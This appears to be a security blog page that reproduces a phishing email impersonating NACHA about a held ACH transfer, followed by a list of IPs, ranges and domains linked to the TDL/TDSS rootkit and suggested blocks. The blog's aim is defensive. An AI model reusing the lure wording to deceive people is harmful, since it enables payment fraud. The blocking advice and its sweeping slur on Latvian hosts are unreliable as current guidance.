From:      "alert@nacha.org" [alert@nacha.org]
Subject:      Your pending ACH debit transfer

Dear Sir or Madam,

Please find below a report about the ACH debit transfer sent on your behalf, that was kept back by our bank:
Transaction #:    638798200851317
Status of the transaction:    pending

In order to resolve this matter, please review the transaction details using the link below as soon as possible.

Yours truly,
Kevin Hunt
Chief Accountant

Some TDL/TDSS rootkit sites to block

The following IPs are related to the TDL/TDSS rootkit. 212.36.9.52 / gic-kbmtu0zkvwylf.com appears to be a C&C server.

94.63.149.10
94.63.149.11
94.63.149.12
94.63.149.13
94.63.149.14
94.63.149.15
146.185.250.140
146.185.250.141
195.3.145.251
195.3.145.252
195.3.145.253
212.36.9.52

94.63.149.0/24 is a Romanian host called Eurolan Solutions SRL, I've had this blocked for months with no ill-effects. 146.185.0.0/16 is Petersburg Internet Network Ltd in Russia, the whole /16 is sparsely populated and blocking that would probably do no harm. 195.3.144.0/22 is Latvia host RN Data SIA, given that Latvia hosts are such a sewer then blocking the /22 is probably also a good idea.

As for 212.36.9.52 (OTEL, Bulgaria), there appear to be a few malware servers in 212.36.8.0/23 mixed with several legitimate sites. 212.36.9.60, 212.36.9.52 and 212.36.9.52 also appear to be malicious. Blocking 212.36.0.48/28 should filter out the bad sites without blocking good ones.

The following domains are associated with these IPs, if you can't block by IP then blocking these might be a good idea,

bejb883-njm.com
bxwqxlkp4ajt.com
feeew0r-geek.com
gic-kbmtu0zkvwylf.com
gv47numkmkmfub8790.com
hhnnbtcnotcf3ohtxt.com
j5dlz7rxoto8g1fubb.com
jblextyhsfqttkz.com
jhv684ybknjkm.com
keter-jankinsome.com
q9-e52wjh7cz.com
retgen-rasch12.com
retno-uhb3.com
rzncgorop-yvpx.com
serch-iteration.com
tylt9avnpfl-zdk.com
uh-i99ur3qa9t3ssw.com
upsbkschmajhlxs6.com
vbhw53jnjjn00o.com
x24l0jpdhtccng-ojw.com
xcxmjb2joopypo.com
zhfg0l5eijw4tjxc.com
zw5kfhmujx024saj2.com

Evil network: Relikts BVK / Sagade Ltd (46.252.130.0/23)

This summary is not available. Please click here to view the post.